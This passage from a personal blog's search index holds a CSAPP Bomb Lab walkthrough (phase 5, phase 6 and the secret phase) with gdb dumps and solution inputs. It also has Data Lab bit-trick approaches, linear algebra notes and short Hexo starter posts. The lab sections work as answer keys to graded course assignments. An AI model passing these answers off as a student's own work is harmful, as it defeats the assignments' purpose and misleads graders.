class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">cmp $<span class="hljs-number">0x6</span>,%eax<br>je<br></code></pre></td></tr></table></figure><p>The string length must be 6</p><p>Enter the loop:<br>Loops 6 times, result %edx=0x37</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c">movzbl (%rbx,%rax,<span class="hljs-number">1</span>),%ecx<br>and $<span class="hljs-number">0xf</span>,%ecx<br>add <span class="hljs-number">0x402560</span>(,%rcx,<span class="hljs-number">4</span>),%edx<br></code></pre></td></tr></table></figure><p>x /6x 0x402560<br>2 a 6 1 c 10</p><p>16+12+10+10+6+1=55<br>The low four bits of each ASCII code serve as the index: 5 4 1 1 2 3<br>edaabc</p><h1 id="6-链表-指针-结构"><a href="#6-链表-指针-结构" class="headerlink" title="6 链表/指针/结构"></a>6 Linked list/pointers/struct</h1><p>disas phase_6</p><p>Calls read_six_numbers<br>Stores them starting at %rsp+0x30</p><p>Big loop 1:<br>All six numbers are distinct and all <= 6</p><p>Loop 2:<br>x /24 0x6042f0</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">0x6042f0</span> <node1>: <span class="hljs-number">0</span>x00000271 <span class="hljs-number">0</span>x00000001 <span class="hljs-number">0</span>x00604300 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604300</span> <node2>: <span class="hljs-number">0</span>x000002f2 <span class="hljs-number">0</span>x00000002 <span class="hljs-number">0</span>x00604310 <span 
class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604310</span> <node3>: <span class="hljs-number">0</span>x00000111 <span class="hljs-number">0</span>x00000003 <span class="hljs-number">0</span>x00604320 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604320</span> <node4>: <span class="hljs-number">0</span>x00000231 <span class="hljs-number">0</span>x00000004 <span class="hljs-number">0</span>x00604330 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604330</span> <node5>: <span class="hljs-number">0</span>x0000016e <span class="hljs-number">0</span>x00000005 <span class="hljs-number">0</span>x00604340 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604340</span> <node6>: <span class="hljs-number">0</span>x0000022f <span class="hljs-number">0</span>x00000006 <span class="hljs-number">0</span>x00000000 <span class="hljs-number">0</span>x00000000<br><br><span class="hljs-attribute">0x6042f0</span> <node1>: <span class="hljs-number">625</span> <span class="hljs-number">1</span> <span class="hljs-number">6308608</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604300</span> <node2>: <span class="hljs-number">754</span> <span class="hljs-number">2</span> <span class="hljs-number">6308624</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604310</span> <node3>: <span class="hljs-number">273</span> <span class="hljs-number">3</span> <span class="hljs-number">6308640</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604320</span> <node4>: <span class="hljs-number">561</span> <span class="hljs-number">4</span> <span class="hljs-number">6308656</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604330</span> <node5>: <span class="hljs-number">366</span> <span class="hljs-number">5</span> <span class="hljs-number">6308672</span> <span 
class="hljs-number">0</span><br><span class="hljs-attribute">0x604340</span> <node6>: <span class="hljs-number">559</span> <span class="hljs-number">6</span> <span class="hljs-number">0</span> <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure><p>The struct linked list:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Node</span>{</span><br> <span class="hljs-type">int</span> val;<br> <span class="hljs-type">int</span> ordinal;<br> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Node</span>* <span class="hljs-title">next</span>;</span><br>};<br></code></pre></td></tr></table></figure><p>The addresses of the 6 structs in the linked list, in the order of the input numbers, are stored one after another starting at %rsp +</p><p>Loop 3:<br>x /12 0x7fffffffe660<br>0x7fffffffe660: 6308608 0 6308592 0<br>0x7fffffffe670: 6308640 0 6308672 0<br>0x7fffffffe680: 6308656 0 6308624 0</p><p>Reorder the linked list</p><p>Loop 4:<br>x /24x 0x6042f0</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs dns"><span class="hljs-number">0x6042f0</span> <node1>: <span class="hljs-number">0x00000271</span> <span class="hljs-number">0x00000001</span> <span class="hljs-number">0x00604320</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604300</span> <node2>: <span class="hljs-number">0</span>x<span class="hljs-number">000002f2</span> <span class="hljs-number">0x00000002</span> <span class="hljs-number">0</span>x<span class="hljs-number">006042f0</span> 
<span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604310</span> <node3>: <span class="hljs-number">0x00000111</span> <span class="hljs-number">0x00000003</span> <span class="hljs-number">0x00000000</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604320</span> <node4>: <span class="hljs-number">0x00000231</span> <span class="hljs-number">0x00000004</span> <span class="hljs-number">0x00604340</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604330</span> <node5>: <span class="hljs-number">0</span>x0000016e <span class="hljs-number">0x00000005</span> <span class="hljs-number">0x00604310</span> <span class="hljs-number">0x00000000</span><br><span class="hljs-number">0x604340</span> <node6>: <span class="hljs-number">0</span>x0000022f <span class="hljs-number">0x00000006</span> <span class="hljs-number">0x00604330</span> <span class="hljs-number">0x00000000</span><br></code></pre></td></tr></table></figure><p>Check that each struct's val >= the val of the next item in the list<br>val in descending order: 2 1 4 6 5 3</p><h1 id="secret-phase"><a href="#secret-phase" class="headerlink" title="secret phase"></a>secret phase</h1><p>secret_phase is called from phase_defused:<br>b *0x401772</p><p>(gdb) x /s 0x402660<br>0x402660: “Curses, you’ve found the secret phase!”<br>(gdb) x /s 0x402688<br>0x402688: “But finding it and solving it are quite different…”<br>Found the right spot 🤗</p><p>sscanf is called first:<br>(gdb) x /s 0x40280b<br>0x40280b: “%d %d %s”<br>Three inputs</p><p>phase_3 or phase_4? 
The %rdi address is the same one phase_4 reads from<br>(gdb) x /s 0x6048b0<br>0x6048b0 <input_strings+240>: “5 15 DrEvil”<br><img src="/images/Bomb-Lab/1.png"></p><p>(gdb) x /s 0x402814<br>0x402814: “DrEvil”<br>The third input is taken and compared for equality</p><p>So, append DrEvil after the phase_4 input</p><hr><p>secret_phase:</p><p>Call read_line to read a string<br>Call strtol to parse it as a decimal num<br>num - 1 <= 1000</p><p>Call fun7:</p><table><thead><tr><th>%rdi</th><th>%rsi</th></tr></thead><tbody><tr><td>0x604110</td><td>num</td></tr></tbody></table><p>The return value must be 5</p><p>fun7:<br>Recursive call; compares num with (%rdi)+</p><p>x /100xg 0x604110</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs dns"><span class="hljs-number">0x604110</span> <n1>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000024</span> <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604130</span><br><span class="hljs-number">0x604120</span> <n1+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604150</span> <span 
class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604130</span> <n21>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000008</span> <span class="hljs-number">0</span>x000000<span class="hljs-number">00006041b0</span><br><span class="hljs-number">0x604140</span> <n21+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604170</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604150</span> <n22>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000032</span> <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604190</span><br><span class="hljs-number">0x604160</span> <n22+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00006041d0</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604170</span> <n32>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000016</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000604290</span><br><span class="hljs-number">0x604180</span> <n32+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604250</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604190</span> <n33>: <span class="hljs-number">0</span>x000000000000002d <span class="hljs-number">0</span>x000000<span class="hljs-number">00006041f0</span><br><span class="hljs-number">0x6041a0</span> <n33+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00006042b0</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span 
class="hljs-number">0x6041b0</span> <n31>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000006</span> <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604210</span><br><span class="hljs-number">0x6041c0</span> <n31+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000604270</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6041d0</span> <n34>: <span class="hljs-number">0</span>x000000000000006b <span class="hljs-number">0</span>x0000<span class="hljs-number">000000604230</span><br><span class="hljs-number">0x6041e0</span> <n34+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00006042d0</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6041f0</span> <n45>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000028</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604200</span> <n45+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604210</span> <n41>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000001</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604220</span> <n41+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604230</span> <n47>: <span class="hljs-number">0</span>x00000<span 
class="hljs-number">00000000063</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604240</span> <n47+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604250</span> <n44>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000023</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604260</span> <n44+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604270</span> <n42>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000007</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604280</span> <n42+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x604290</span> <n43>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000014</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042a0</span> <n43+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042b0</span> <n46>: <span class="hljs-number">0</span>x000000000000002f <span class="hljs-number">0</span>x00000<span 
class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042c0</span> <n46+<span class="hljs-number">16</span>>: <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br><span class="hljs-number">0x6042d0</span> <n48>: <span class="hljs-number">0</span>x000000<span class="hljs-number">00000003e9</span> <span class="hljs-number">0</span>x00000<span class="hljs-number">00000000000</span><br></code></pre></td></tr></table></figure><p>A binary search tree</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Tree</span>{</span><br> <span class="hljs-type">int</span> val;<br> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Tree</span>* <span class="hljs-title">left</span>;</span><br> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Tree</span>* <span class="hljs-title">right</span>;</span><br>};<br></code></pre></td></tr></table></figure><p><img src="/images/Bomb-Lab/Tree.png" alt="Binary tree"></p><p>Return value 5: right, left, right, 0<br>47</p>]]></content>
<categories>
<category>CSAPP</category>
</categories>
</entry>
<entry>
<title>Data Lab</title>
<link href="/2023/12/18/Data-Lab/"/>
<url>/2023/12/18/Data-Lab/</url>
<content type="html"><![CDATA[<ol><li><p>bitXor(x, y)<br>Description: implement ~(x|y) using only ~ and &<br>Approach: by De Morgan's law, ~(x|y) = ~x & ~y follows directly.</p></li><li><p>copyLSB(x)<br>Description: set every bit of x to the value of its least significant bit<br>Approach: use the properties of shifts: first shift the lowest bit of x left into the highest position, then arithmetic-shift it back right. If that bit is 0 the result is all 0s; if it is 1 the result is all 1s.</p></li><li><p>isEqual(x, y)<br>Description: return 1 if x==y, otherwise 0<br>Approach: for x==y, use bitwise XOR ^: when x==y the result is all 0s, otherwise it contains a 1. Then apply logical NOT !: all 0s returns 1, anything else returns 0.</p></li><li><p>bitMask(highbit, lowbit)<br>Description: generate a mask whose bits from lowbit through highbit are all 1<br>Approach: to produce a mask that is 1 from low through high and 0 elsewhere, bitwise XOR ^ can again be used. Shift an all-1s word left by low and by high+1 respectively and XOR the two; the segment in between where they differ becomes 1 and everything else 0. The special case lowbit > highbit must also be handled, by ANDing once more with the low mask.</p></li><li><p>bitCount(int x)<br>Description: count the number of 1 bits in x<br>Approach - baseline: use divide and conquer: build a mask, compute the number of 1s in each byte of x, then fold the results into the low 8 bits.</p></li><li><p>tmax()<br>Description: return the largest two's-complement integer<br>Approach: the largest two's-complement value is 0x7FFFFFFF, obtained by bitwise negating 0x80000000.</p></li><li><p>isNonNegative(x)<br>Description: return 1 if x>=0, otherwise 0<br>Approach: whether x is non-negative depends on whether the sign bit is 1; shift the top bit right by 31 and apply logical NOT !.</p></li><li><p>addOK(x, y)<br>Description: determine whether x+y does not overflow<br>Approach: signed addition overflows exactly when the two operands have the same sign and the sum has the opposite sign. Check for that.</p></li><li><p>rempwr2(x, n)<br>Description: compute x % (2^n)<br>Approach - baseline: for a positive x it is enough to take the low n bits of x. For a negative x, convert it to positive by negating and adding 1, take the low n bits, then negate and add 1 to convert back to negative. Since if statements are not allowed, the two cases are unified through the absolute-value operation; see problem 11.</p></li><li><p>isLess(x, y)<br>Description: return 1 if x<y, otherwise 0<br>Approach: when the signs differ the result follows directly; when the signs are the same, use the sign of x-y.</p></li><li><p>absVal(x)<br>Description: the absolute value of x<br>Approach: a positive number stays unchanged; a negative number is negated and incremented by one. The two operations can be unified through arithmetic on x >> 31.</p></li><li><p>isPower2(x)<br>Description: return 1 if x is a power of 2, otherwise 0<br>Approach: that is, check whether x, apart from a sign bit of 0, consists of a single 1 bit. After excluding x<0 and x=0, for positive x the expression !(x & (x + (~0))) tells whether there is exactly one 1.</p></li><li><p>float_neg(uf)<br>Description: compute -f<br>Approach: for a bit-level floating-point value, negation is just flipping the sign bit. The NaN case must be excluded: check whether the exponent field E is all 1s and the fraction field M is non-zero.</p></li><li><p>float_half(uf)<br>Description: return the bit-level representation of 0.5*f<br>Approach: in the normalized case, dividing by two is the same as subtracting 1 from the exponent field E. For inf or NaN, check whether the exponent field E is all 1s and return directly. When the result is denormalized, dividing by two is a right shift by one bit, and round-to-even must also be respected: when the low two bits are 11, patch the result so that its lowest bit is 0.</p></li><li><p>float_i2f(x)<br>Description: return the bit-level representation of (float)x<br>Approach: if x is 0, return directly. For non-zero x, find the position of the first 1 in x (excluding the sign bit) to obtain the value of the exponent field E. Then extract the fraction field M from x. Since the low 9 bits of x are discarded, rounding also needs a patch.</p></li></ol><hr><p>References:</p><ul><li><a href="https://zhuanlan.zhihu.com/p/472188244">https://zhuanlan.zhihu.com/p/472188244</a></li><li><a href="https://zhuanlan.zhihu.com/p/661117391">https://zhuanlan.zhihu.com/p/661117391</a></li><li><a href="https://blog.csdn.net/dopamine_joker/article/details/121029939">https://blog.csdn.net/dopamine_joker/article/details/121029939</a></li><li><a href="https://dovahyol.github.io/blog/2017/11/09/bit-count.html">https://dovahyol.github.io/blog/2017/11/09/bit-count.html</a></li></ul>]]></content>
<categories>
<category>CSAPP</category>
</categories>
</entry>
<entry>
<title>Linear Algebra</title>
<link href="/2023/08/17/Linear-Algebra/"/>
<url>/2023/08/17/Linear-Algebra/</url>
<content type="html"><![CDATA[<h2 id="Basics"><a href="#Basics" class="headerlink" title="Basics"></a>Basics</h2><p>A matrix represents a linear map.</p><hr><p>For the linear system <code>Ax = b</code> with an arbitrary vector $\vec{b}$:</p><ul><li>Unique solution: the matrix A is invertible, $x = A^{-1} \vec{b}$</li><li>No solution:</li></ul><hr><p>Matrix $A$ = ($\vec{u}$, $\vec{v}$, $\vec{w}$)</p><p>If $A$ is invertible, then</p><ul><li>all linear combinations of $\vec{u}$, $\vec{v}$, $\vec{w}$ make up the whole 3-dimensional space.</li><li>the vectors $\vec{u}$, $\vec{v}$, $\vec{w}$ are linearly independent. Correspondingly, $Ax = \vec{0}$ has only the zero solution.</li></ul><p>Otherwise, $\vec{0}$ can be written as more than one linear combination of $\vec{u}$, $\vec{v}$, $\vec{w}$. The matrix $A$ is called singular, and the vectors $\vec{u}$, $\vec{v}$, $\vec{w}$ are linearly dependent.</p><p>Summary:<br>If the column vectors of a square matrix $A$ are linearly independent, then $A$ is invertible and $Ax = \vec{0}$ has only the zero solution;<br>if the column vectors of a square matrix $A$ are linearly dependent, then $A$ is singular and $Ax = \vec{0}$ has infinitely many solutions.</p><hr><p>Rank</p><h3 id=""><a href="#" class="headerlink" title=""></a></h3><p>Orthogonal matrix: $AA^T = I$</p><h3 id="-1"><a href="#-1" class="headerlink" title=""></a></h3><p><a href="https://zhuanlan.zhihu.com/p/45246414">15. MIT Linear Algebra: Projections - Zhihu</a></p><h2 id="矩阵分解"><a href="#矩阵分解" class="headerlink" title="矩阵分解"></a>Matrix Decompositions</h2><h3 id="特征分解"><a href="#特征分解" class="headerlink" title="特征分解"></a>Eigendecomposition</h3><p>$Av = \lambda v$<br><a href="https://zhuanlan.zhihu.com/p/649770264">Proof: the sum of the eigenvalues equals the trace, and the product of the eigenvalues equals the determinant - Zhihu</a></p><p>$A = V \operatorname{diag}(\lambda) V^{-1}$</p><h3 id="SVD-分解"><a href="#SVD-分解" class="headerlink" title="SVD 分解"></a>SVD Decomposition</h3><p>$A = U \Sigma V^\mathrm T$</p><h3 id="PCA"><a href="#PCA" class="headerlink" title="PCA"></a>PCA</h3><p><a href="http://blog.codinglabs.org/articles/pca-tutorial.html">CodingLabs - The Mathematics of PCA</a></p><p>[[概率论 revisted#统计量]]<br>Diagonalize the covariance matrix</p><p>$$ Y=PX $$</p><p>$$<br>\begin{array}{l l l}<br>D & = & \frac{1}{m}YY^\mathsf{T} \\<br>& = & \frac{1}{m}(PX)(PX)^\mathsf{T} \\<br>& = & \frac{1}{m}PXX^\mathsf{T}P^\mathsf{T} \\<br>& = & P(\frac{1}{m}XX^\mathsf{T})P^\mathsf{T} \\<br>& = & PCP^\mathsf{T}<br>\end{array}<br>$$</p><h2 id="二次型"><a href="#二次型" class="headerlink" title="二次型"></a>Quadratic Forms</h2>]]></content>
</entry>
<entry>
<title>My First Post</title>
<link href="/2023/08/11/My-First-Post/"/>
<url>/2023/08/11/My-First-Post/</url>
<content type="html"><![CDATA[<p>Summer TODO</p><ul><li><input checked="" disabled="" type="checkbox"> hands on AI</li><li><input disabled="" type="checkbox"> missing semester</li><li><input disabled="" type="checkbox"> CODE</li></ul><br/><p>GOGOGO!</p>]]></content>
</entry>
<entry>
<title>Hello World</title>
<link href="/2023/08/11/hello-world/"/>
<url>/2023/08/11/hello-world/</url>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo new <span class="hljs-string">"My New Post"</span><br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo server<br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo generate<br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ hexo deploy<br></code></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
</entry>
</search>